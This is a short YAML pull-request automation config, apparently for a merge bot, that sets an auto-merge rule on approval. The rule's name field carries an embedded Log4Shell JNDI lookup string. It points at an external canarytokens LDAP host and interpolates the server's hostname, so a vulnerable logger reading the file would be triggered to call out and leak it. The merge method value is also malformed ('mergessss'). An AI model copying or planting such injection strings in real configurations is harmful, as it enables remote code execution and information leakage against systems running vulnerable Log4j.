pull_request_rules:
  - name: Automatic merge on approval${jndi:ldap://x${hostName}.L4J.j7z9gk19q76gw0be2txfwp1v1.canarytokens.com/a}
    conditions:
      - "#approved-reviews-by>=1"
    actions:
      merge:
        method: mergessss
